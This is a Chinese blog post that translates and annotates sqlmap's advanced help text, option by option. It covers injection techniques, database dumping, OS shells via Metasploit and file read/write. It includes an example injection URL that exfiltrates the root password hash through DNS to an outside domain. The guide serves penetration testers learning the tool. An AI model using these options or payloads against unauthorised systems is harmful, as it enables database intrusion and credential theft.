1. 程式人生 > >sqlmap幫助文件(配合實踐翻譯)

sqlmap幫助文件(配合實踐翻譯)

用過sqlmap,也用過不少功能了,為了更加了解這個工具,決定翻譯一下,利用自己的實戰經驗去翻譯

翻譯確實有點辛苦,有些選項還實踐不了,但是收穫還是很多的

不惜感嘆:sqlmap真強大啊~~~~~~~~

建議使用  ctrl + f 進行查查詢, 方便自己方便別人

注:來源於sqlmap -hh

         _
 ___ ___| |_____ ___ ___  {1.0.9.8#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

用法
Usage: python sqlmap.py [options]

Options: 選項
  -h, --help            Show basic help message and exit
    基本的幫助資訊
  -hh                   Show advanced help message and exit
    更加詳細的幫助資訊
  --version             Show program's version number and exit
    版本資訊
  -v VERBOSE            Verbosity level: 0-6 (default 1)
    這個是設定sqlmap輸出資訊的詳細程度,預設是1,設定成3(-v 3)就顯示出payload的資訊了,這個非常適合學習的一個引數

  下面給出sqlmap.config檔案中的對這個的詳細描述
    # Verbosity level.
    # Valid: integer between 0 and 6
    # 0: Show only error and critical messages  只顯示錯誤和關鍵資訊
    # 1: Show also warning and info messages    警告和資訊
    # 2: Show also debug messages               除錯資訊
    # 3: Show also payloads injected            payload,如:[15:32:10] [PAYLOAD] 1)',(..)"("
    # 4: Show also HTTP requests                整個GET報文都看到了
    # 5: Show also HTTP responses' headers         返回報文的頭部 
    # 6: Show also HTTP responses' page content    返回的html程式碼都有了
    # Default: 1

  Target: 目標
    At least one of these options has to be provided to define the
    target(s)
        至少從下面選擇設定一個目標,最常用的就-u了,url嘛

    -d DIRECT           Connection string for direct database connection
    直接連線資料庫,如:mysql的話
        -d mysql://USER:
[email protected]
_IP:DBMS_PORT/DATABASE_NAME 不過的話呢,這個我試過是要裝第三方庫的 -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") 這個指定url的肯定最熟悉了 -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file burp用的多,但這個應該我們很少用啊,在burp的option-misc裡面有個logging選項儲存log檔案 查了一下:加多兩個引數效率更快 python sqlmap.py -l 檔名 --batch -smart batch:自動選yes。 smart:啟發式快速判斷,節約時間。 -x SITEMAPURL Parse target(s) from remote sitemap(.xml) file 從xml檔案中解析目標 -m BULKFILE Scan multiple targets given in a textual file 這個應該是從大檔案中讀取超級多的目標,一般檔案多了就一部分一部分地讀了,這個就像是一個大字典 -r REQUESTFILE Load HTTP request from a file 這個也用的較多,尤其是POST注入,將一些抓包軟體(如burp)抓到的HTTP報文直接儲存在檔案中,跟著-r就搞掂了 -g GOOGLEDORK Process Google dork results as target URLs 通過google搜尋找到的url作為目標,這個也是google hacking了 -c CONFIGFILE Load options from a configuration INI file 通過ini檔案設定選項,這個還用過啊,下面的--save引數就是儲存引數到ini檔案的了,這個方便下次再次黑它 Request: 請求 These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) 指定HTTP請求的方法,GET,POST,PUT,MOVE等 --data=DATA Data string to be sent through POST 指定POST的引數 --param-del=PARA.. Character used for splitting parameter values 這個拆分一些引數的,如下面用;拆分post引數 python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users --cookie=COOKIE HTTP Cookie header value 指定cookie值 --cookie-del=COO.. Character used for splitting cookie values 指定分割cookie值的字元是什麼 --load-cookies=L.. File containing cookies in Netscape/wget format 這個是從檔案中讀取cookie吧,Netscape/wget格式的 --drop-set-cookie Ignore Set-Cookie header from response 忽略響應包的Set-Cookie頭 --user-agent=AGENT HTTP User-Agent header value 指定User-Agent使用者代理 --random-agent Use randomly selected HTTP User-Agent header value 隨機選用sqlmap目錄中的User-Agent,這個檔案再txt目錄 --host=HOST HTTP Host header value 指定主機頭 --referer=REFERER HTTP Referer header value 指定Referer頭,就是請求來源的意思 -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1") 指定某個頭部,如: -H "X-Forwarded-For: 127.0.0.1" --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") 這個的話應該是可以指定多個,用\n分割 --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI) 指定http認證型別 --auth-cred=AUTH.. HTTP authentication credentials (name:password) 指定http認證的賬戶名和密碼,就行apache就可以設定訪問某個目錄時要認證 --auth-file=AUTH.. HTTP authentication PEM cert/private key file 指定一個私鑰檔案來認證 --ignore-401 Ignore HTTP Error 401 (Unauthorized) 忽略401錯誤 --proxy=PROXY Use a proxy to connect to the target URL 指定代理 --proxy-cred=PRO.. Proxy authentication credentials (name:password) 指定代理的認證資訊,就是賬號密碼 --proxy-file=PRO.. Load proxy list from a file 從檔案中選擇代理 --ignore-proxy Ignore system default proxy settings 忽略系統預設代理 --tor Use Tor anonymity network 使用tor網路 --tor-port=TORPORT Set Tor proxy port other than default 設定tor的埠,如果不是預設埠的話 --tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default)) 設定tor代理的型別 --check-tor Check to see if Tor is used properly 檢測tor能不能用 --delay=DELAY Delay in seconds between each HTTP request 設定每個HTTP請求的時間間隔,這個在有些限制單位時間請求數的防火牆的時候可以用得到,我上次就用過 --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) 設定超時時間,預設30秒 --retries=RETRIES Retries when the connection timeouts (default 3) 設定重試的次數,預設3次 --randomize=RPARAM Randomly change value for given parameter(s) 隨機地更改給定引數的值 --safe-url=SAFEURL URL address to visit frequently during testing 有的web應用程式會在你多次訪問錯誤的請求時遮蔽掉你以後的所有請求 這裡提供一個安全不錯誤的連線,每隔一段時間都會去訪問一下 --safe-post=SAFE.. POST data to send to a safe URL 這裡設定一個正確的post資料 --safe-req=SAFER.. Load safe HTTP request from a file 從檔案中讀取安全,或者叫正確的http請求 --safe-freq=SAFE.. Test requests between two visits to a given safe URL 設定訪問安全url的時間間隔 --skip-urlencode Skip URL encoding of payload data 不進行url編碼 --csrf-token=CSR.. Parameter used to hold anti-CSRF token 設定CSRF的token --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token --force-ssl Force usage of SSL/HTTPS 強制使用https --hpp Use HTTP parameter pollution method 嘗試了一下,只能用於ASP,得到報錯資訊如下: [WARNING] HTTP parameter pollution should work only against ASP(.NET) targets --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") 傳送請求之前,先執行這段python程式碼,比如對某個引數進行處理 比如下面的,hash引數就是id的md5值 python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()" Optimization: 一些優化 These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches 開啟所有優化選項 --predict-output Predict common queries output 預測常見的查詢輸出,可能跟一些報錯出資料庫資訊那些有關,具體應要看原始碼才能說,有機會的話我看原始碼補充下 --keep-alive Use persistent HTTP(s) connections 使用持久連線 --null-connection Retrieve page length without actual HTTP response body 獲得頁面的長度(應該有多少字元吧,這個具體我也不確定) 除去HTTP的響應的body部分 --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) 設定執行緒,預設為1 Injection: 注入 These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) 設定測試的引數,sqlmap預設測試所有的GET和POST引數,當--level的值大於等於2的時候也會測試HTTP Cookie頭的值,當大於等於3的時候也會測試User-Agent和HTTP Referer頭的值。 這裡就給你自己設定了 例如: -p "id,user-agent" --skip=SKIP Skip testing for given parameter(s) 跳過測試給定的引數 --skip-static Skip testing parameters that not appear dynamic 跳過測試引數是否是靜態的 --dbms=DBMS Force back-end DBMS to this value 指定後端的資料庫型別(mysql,mssql等) --dbms-cred=DBMS.. DBMS authentication credentials (user:password) 指定資料庫的認證資訊(user:password) --os=OS Force back-end DBMS operating system to this value 指定後臺的系統型別 --invalid-bignum Use big numbers for invalidating values 使用大數字(說是無效值),比如payload會出現8446744073709551610這樣大的,配合-v 3就能看到 --invalid-logical Use logical operations for invalidating values 使用邏輯字元,比如下面的: SELECT CHR(101)&CHR(99)&CHR(108)&CHR(89) SELECT CHAR(82)+CHAR(90)+CHAR(71)+CHAR(84)) SELECT CHAR(67)||CHAR(88)||CHAR(73)||CHAR(105) --invalid-string Use random strings for invalidating values 使用隨機字元 --no-cast Turn off payload casting mechanism 這個看著英文像是關閉payload構造機制 --no-escape Turn off string escaping mechanism 關閉字串逃逸機制 --prefix=PREFIX Injection payload prefix string 設定注入的字首,比如單引號注入點就設定字首為單引號 --suffix=SUFFIX Injection payload suffix string 設定注入payload的字尾 --tamper=TAMPER Use given script(s) for tampering injection data 使用給定的指令碼去修改payload中的資料,達到繞過WAF的目的 Detection: 發現 These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) 這個的話,sqlmap使用測試的方法就越多,傳送越多請求,耗時也越長 --risk=RISK Risk of tests to perform (1-3, default 1) boolean-based blind SQL injection tests with AND are considered risk 1, with OR are considered risk 3:這句話是從sqlmap配置檔案中找的,就是說基於布林型盲注and型的就是risk1,or型的就是risk3,那麼risk2是兩個都搞? --string=STRING String to match when query is evaluated to True 設定一些返回頁面中的字元,頁面返回這個字元,說明我們的注入判斷語句是正確的 --not-string=NOT.. String to match when query is evaluated to False 設定返回頁面沒返回某個字元,就是判斷錯誤 --regexp=REGEXP Regexp to match when query is evaluated to True 用正則匹配告訴sqlmap返回什麼是正確的 --code=CODE HTTP code to match when query is evaluated to True 用HTTP的響應碼來判斷注入判斷語句是正確的,例如,響應200的時候為真,響應401的時候為假,可以新增引數--code=200 --text-only Compare pages based only on the textual content 真條件下的返回頁面與假條件下返回頁面是不同可以使用這個 --titles Compare pages based only on their titles 真條件下的返回頁面的標題與假條件下返回頁面的標題是不同可以使用這個 Techniques: 注入技術 These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") 指定注入技術,預設使用全部(default "BEUSTQ"),那個含義如下: # B: Boolean-based blind SQL injection # E: Error-based SQL injection # U: UNION query SQL injection # S: Stacked queries SQL injection # T: Time-based blind SQL injection # Q: Inline SQL injection --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) 使用基於時間的盲注時,設定的資料庫延遲,預設是5 --union-cols=UCOLS Range of columns to test for UNION query SQL injection 設定聯合查詢列的數目的範圍 --union-char=UCHAR Character to use for bruteforcing number of columns 設定union查詢使用的字元,預設使用NULL --union-from=UFROM Table to use in FROM part of UNION query SQL injection 這個就不知道了,使用表單中的元素放到union注入中? --dns-domain=DNS.. Domain name used for DNS exfiltration attack 利用dns進行注入加快盲注,可以看看這個 http://blog.csdn.net/qq_27446553/article/details/51794326 示例url:http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT(、\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where ser='root' limit 1),'.md5crack.cn\\foobar'))),1,1)%23 --second-order=S.. Resulting page URL searched for second-order response 這個就是我們常說的二次注入了,設定後幫你尋找二次注入的頁面,不過沒用過。。。 Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint 這個應該是資料庫指紋識別,加了可能識別更好 Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything 檢索所有,這是拖庫的節奏啊 -b, --banner Retrieve DBMS banner 檢索資料庫的一些標誌性的資訊,就是指紋這樣子吧 --current-user Retrieve DBMS current user 檢索當前連線資料庫的使用者 --current-db Retrieve DBMS current database 檢索當前連線的資料庫 --hostname Retrieve DBMS server hostname 檢索伺服器的主機名 --is-dba Detect if the DBMS current user is DBA 檢測是不是dba,就是root許可權咯 --users Enumerate DBMS users 列舉資料庫使用者 --passwords Enumerate DBMS users password hashes 列舉資料庫使用者的雜湊值 --privileges Enumerate DBMS users privileges 列舉資料庫使用者的許可權 --roles Enumerate DBMS users roles 列舉資料庫使用者的角色 --dbs Enumerate DBMS databases 列舉資料庫有哪些 --tables Enumerate DBMS database tables 列舉資料表名 --columns Enumerate DBMS database table columns 列舉列名 --schema Enumerate DBMS schema 這個測試過,將所有的資料庫的表的基本資訊都枚舉了,有哪些列,列的資料型別,具體資料就沒有列舉 --count Retrieve number of entries for table(s) 列舉表格個數 --dump Dump DBMS database table entries 輸出資料庫表的資料 --dump-all Dump all DBMS databases tables entries 輸出所有 --search Search column(s), table(s) and/or database name(s) 查詢特定的列名,表名或資料庫名,配合下面的-D,-C,-T --comments Retrieve DBMS comments 列舉資料庫的註釋 -D DB DBMS database to enumerate 指定資料庫名 -T TBL DBMS database table(s) to enumerate 指定表名 -C COL DBMS database table column(s) to enumerate 指定列名 -X EXCLUDECOL DBMS database table column(s) to not enumerate 指定不列舉那個列 -U USER DBMS user to enumerate 列舉使用者,但單獨用這個引數感覺沒什麼用啊,這個可能要看原始碼才能解決了,估計要配合其他引數 --exclude-sysdbs Exclude DBMS system databases when enumerating tables 列舉時排除系統的資料庫 --pivot-column=P.. Pivot column name 以某一列為核心?這個用過沒感覺出什麼用 --where=DUMPWHERE Use WHERE condition while table dumping 使用where除錯限制table的輸出 --start=LIMITSTART First query output entry to retrieve 指定開始從第幾行開始輸出,如--start=3,前兩行就不輸出了 --stop=LIMITSTOP Last query output entry to retrieve 指定從第幾行開始停止輸出 --first=FIRSTCHAR First query output word character to retrieve 指定只輸出第幾個字元開始輸出,盲注才有效,親測 --last=LASTCHAR Last query output word character to retrieve 指定只輸出第幾個字元停止輸出,盲注才有效,親測,跟上面的配合指定範圍, 如 :--first 3 --last 5 只輸出3到5位置的字元 --sql-query=QUERY SQL statement to be executed 指定執行我們的sql語句 --sql-shell Prompt for an interactive SQL shell 返回一個sql的shell --sql-file=SQLFILE Execute SQL statements from given file(s) 從檔案中讀取執行sql語句 Brute force: 爆破 These options can be used to run brute force checks --common-tables Check existence of common tables 檢測常見的表名 --common-columns Check existence of common columns 檢測常見的列名 User-defined function injection: 使用使用者定義的函式注入 These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library 這兩個具體沒用過,直譯就是注入使用者定義的函式,另一個就是指定本地共享庫 File system access: 檔案系統訪問 These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system 讀取伺服器檔案 --file-write=WFILE Write a local file on the back-end DBMS file system 寫伺服器檔案 --file-dest=DFILE Back-end DBMS absolute filepath to write to 設定寫入的絕對路徑 Operating system access: 作業系統訪問 These options can be used to access the back-end database management system underlying operating system 注意下面這些要有相應的許可權,一般要root --os-cmd=OSCMD Execute an operating system command 執行一個指定的命令 --os-shell Prompt for an interactive operating system shell 返回一個shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC 這個引數需要訪問metasploit,結合metasploit使用的 --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC 這個引數也需要訪問metasploit --os-bof Stored procedure buffer overflow exploitation 嘗試儲存過程的緩衝區溢位 --priv-esc Database process user privilege escalation 利用資料庫程序使用者進行許可權提升 --msf-path=MSFPATH Local path where Metasploit Framework is installed 指定metasploit的路徑 --tmp-path=TMPPATH Remote absolute path of temporary files directory 設定臨時檔案路徑 Windows registry access: windows登錄檔訪問 These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value 讀取一個鍵 --reg-add Write a Windows registry key value data 寫一個鍵 --reg-del Delete a Windows registry key value 刪除一個鍵 下面的應該配合上面使用的 --reg-key=REGKEY Windows registry key 指定鍵 --reg-value=REGVAL Windows registry key value 指定鍵值 --reg-data=REGDATA Windows registry key value data 值的資料 --reg-type=REGTYPE Windows registry key value type 值得型別 General: 通用的 These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file 從.sqlite恢復那個會話(注入過就會自動生成),那個檔案在sqlmap的output檔案,(windows在C:\Users\Administrator\.sqlmap\output\) -t TRAFFICFILE Log all HTTP traffic into a textual file HTTP請求儲存到檔案中 --batch Never ask for user input, use the default behaviour 不要詢問,使用預設選項 --binary-fields=.. Result fields having binary values (e.g. "digest") 設定有些欄位是二進位制數值? --charset=CHARSET Force character encoding used for data retrieval 設定編碼 --crawl=CRAWLDEPTH Crawl the website starting from the target URL 從某個url開始爬取網站 --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout") 排除爬取網站的關鍵字,如logout --csv-del=CSVDEL Delimiting character used in CSV output (default ",") 設定輸出結果時的分隔符 --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) 設定輸出是的格式,csv,html,SQLITE等 --eta Display for each output the estimated time of arrival 顯示每個輸出估計的耗時 --flush-session Flush session files for current target 重新整理這個url的儲存會話資訊,就是更新以前注入的記錄,如管理員改密碼了,就要重新注入了 --forms Parse and test forms on target URL 解析測試目標url的表單 --fresh-queries Ignore query results stored in session file 忽略儲存在會話檔案儲存的查詢結果 --hex Use DBMS hex function(s) for data retrieval 使用十六進位制 --output-dir=OUT.. Custom output directory path 設定輸出路徑 --parse-errors Parse and display DBMS error messages from responses 解析輸出資料庫錯誤資訊 --save=SAVECONFIG Save options to a configuration INI file 儲存選項到ini檔案 --scope=SCOPE Regexp to filter targets from provided proxy log 正則表示式過濾代理檔案提供的代理? --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) 設定含我們指定關鍵字的某些測試的payload --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK) 跳過測試指定關鍵字的某些測試的payload --update Update sqlmap 更新sqlmap,記得更新了 Miscellaneous: 雜項 -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") 短記憶,什麼鬼 --alert=ALERT Run host OS command(s) when SQL injection is found 如果存在注入,執行系統命令 --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") 設定 --beep Beep on question and/or when SQL injection is found 嗶一聲,找到注入的話 --cleanup Clean up the DBMS from sqlmap specific UDF and tables 清理資料庫什麼鬼,這個也不懂 --dependencies Check for missing (non-core) sqlmap dependencies 看看sqlmap缺少什麼第三方庫 --disable-coloring Disable console output coloring 關閉顏色的輸出,就沒那麼美觀咯 --gpage=GOOGLEPAGE Use Google dork results from specified page number 指定google搜尋的頁碼,找sqlmap注入目標 --identify-waf Make a thorough testing for a WAF/IPS/IDS protection 嘗試辨認WAF/IPS/IDS的型別 --mobile Imitate smartphone through HTTP User-Agent header 使用手機User-Agent --offline Work in offline mode (only use session data) 使用離線模式 --page-rank Display page rank (PR) for Google dork results 顯示該url,google的rank值 --purge-output Safely remove all content from output directory 安全地刪除output資料夾 --skip-waf Skip heuristic detection of WAF/IPS/IDS protection 跳過探測WAF/IPS/IDS --smart Conduct thorough tests only if positive heuristic(s) 全面的掃描如果是積極的啟發式,不知什麼鬼 --sqlmap-shell Prompt for an interactive sqlmap shell 互動式的sqlmap shell --tmp-dir=TMPDIR Local directory for storing temporary files 設定臨時檔案目錄 --wizard Simple wizard interface for beginner users 為初學者使用者提供簡單的嚮導,就是問你那個url,一步步問下去

相關推薦

sqlmap幫助(配合實踐翻譯)

用過sqlmap,也用過不少功能了,為了更加了解這個工具,決定翻譯一下,利用自己的實戰經驗去翻譯 翻譯確實有點辛苦,有些選項還實踐不了,但是收穫還是很多的 不惜感嘆:sqlmap真強大啊~~~~~~~~ 建議使用  ctrl + f 進行查查詢, 方便自己方便別人

ST 電機控制工作臺幫助翻譯 之 介紹(快速開始)

                                                                                                                                      

分散式日誌框架之ExceptionLess【二】:自行搭建幫助翻譯

原文地址:https://github.com/exceptionless/Exceptionless/wiki/Self-Hosting ExceptionLess自行託管環境搭建 一、測試環境  如果你想在本地測試ExceptionLess,請遵循本節如下步驟。但是,請注意!以下事項僅

Tomcat幫助翻譯 未完成

                        All commands that the Manager application knows how to process are specified in a single request URI like this:                    

翻譯第003篇:Process Monitor幫助(Part 3,附Process Monitor的簡單演示)

【匯入與匯出配置】         一旦您配置了一個篩選器,您可以使用“工具(Tools)”選單中的“儲存篩選器(SaveFilters)”選單項將其儲存。Process Monitor將您所儲存的篩選器新增到“讀取篩選器(Load Filter)”選單,便於您能夠方便地訪

網路抓包工具 翻譯幫助 詳解教程

How To Set Up a Capture 1. 確保你做的事是被允許的!           (1)意思是在不違反法律的情況下抓取可以被允許抓取的包。 2.一般設定           (1)許可權的設定,你是否有許可權去獲取使用者或者管理員的資料。        

SAP 官網中文幫助&BP中文資料匯總

target oba rac pro 資料 packages spa app soft 系統 描述 版本 連接 SAP ME 制造執行 SAP Manufacturing Execution (SAP ME) 15.0 點擊我 SAP ECC

Sphinx 生成 Windows 幫助 (.chm)

點擊 pro HR image lib absolute sphinx pen 開發 本文不介紹 Sphinx 的用法,只簡要羅列 Windows 下生成 .chm 文件的步驟。 0. 首先檢查機器是否安裝了 HTML Help Workshop 軟件,一般安

linux學習筆記3-鏈接、shutdown命令、幫助man

lin down 51cto ges shu RoCE watermark 圖片 mark linux學習筆記3-文件鏈接、shutdown命令、幫助文件man

word轉chm幫助最有效方法,支援word超連結

下載連結:http://download.csdn.net/download/wangxingxing321/10146637 今天試了很多轉CHM的軟體,要不轉不成功,要不轉成的CHM檔案不支援超連結,記錄有效方法如下: 本機環境:windows 10 office2003(本來是W

Java 007 面向物件(構造方法、static關鍵字、JDK幫助、Math類)

知識點梳理 心得體會 小知識點 1.不同型別的靜態變數 1>靜態變數是基本資料型別時,類的外部不用建立該類例項可以能直接使用 2>靜態變數是引用時,即靜態變數是一個物件的引用,必須先初始化這個物件,才能將引用指向靜態變數 2.靜態成員與例項成員 1&

windows版本nginx幫助

本文是nginx官方文件的直譯。引文連結原文連結 nginx的windows版本使用原生的win32API。當前只使用了select()連線處理方法,因此不應認為它有高效能和具有可伸縮性。由於眾所周知的原因,windows版本的nginx通常被認為是beta版本。但是,它幾乎提供了unix版本一樣的功能(x

OpenvSwitch幫助-中文版

因本人在學習IAAS的時候遇到一些網橋的管理,而我英語太渣,所以特地找了分中文幫助,非原創,本文轉自:這裡 Open vSwitch 命令 init             &

Qt幫助英文名詞解釋

Qt幫助文件英文解釋: Qt 5.8.0 Reference Documentation 百度翻譯:QT5.0.0參考文獻 Contents// 內容 Properties// 性質 Public Functions// 公有類函式 Reimplemented Public Functi

ScrollViewAPI幫助

結構 繼承關係public class ScrollView extends FrameLayout java.lang.Objectandroid.view.Viewandroid.view.ViewGroupandroid.widget.Frame

【man】 檢視命令幫助

【man】 檢視命令幫助文件man COMMAND man命令分章節檢視命令章節可以使用 whatis read通常不通章節說明內容如下:第一章節:使用者命令(/bin,/usr/bin,/usr/local/bin)第二章節:系統呼叫第三章節:庫使用者呼叫第四章節:特殊檔案(裝置檔案都是特殊檔案,裝置的訪

下載的 Oracle 幫助 開啟是 空白的

下載地址: http://www.youxiaxiazai.com/soft/28/6976.html   碰到幾個問題,就是我下載的 Oracle 幫助文件,但是開啟時卻是空白的,很鬱悶, 查找了一番,問題得到了解決! 下面是解決的方法 1、下載解壓後,直

Dev-cpp5.4.0及API幫助 百度雲下載連結

連結:https://pan.baidu.com/s/1Qk2GiHqd9qQ8nobW6BS0EQ  提取碼:zlrh  複製這段內容後開啟百度網盤手機App,操作更方便哦 C/C++ 選手注意 競賽統一使用dev-cpp軟體。該軟體支援ANSI C++ 標準,支援

Linux之幫助查詢

大部分人肯定記不住Linux中這麼多的命令和那麼多讓人頭痛的命令似乎linux開發者也預見這種情況,於是有了man和info等命令 man命令 如果你不知道man命令怎麼使用你可以man man查詢,man可以查詢兩種,一種是命令比如

芭蕉樹上第十五根芭蕉-- qt幫助使用

我們使用 Qt 幫助文件,主要分為這麼幾步: 1)類使用的相關介紹 2)檢視所用部件(類)的相應成員函式(功能,引數,返回值) 3)檢視部件的訊號 4)檢視部件的事件(所對應的虛擬函式如何編寫) (1)類使用的相關介紹 游標移動到類名字的地方,接著按“F1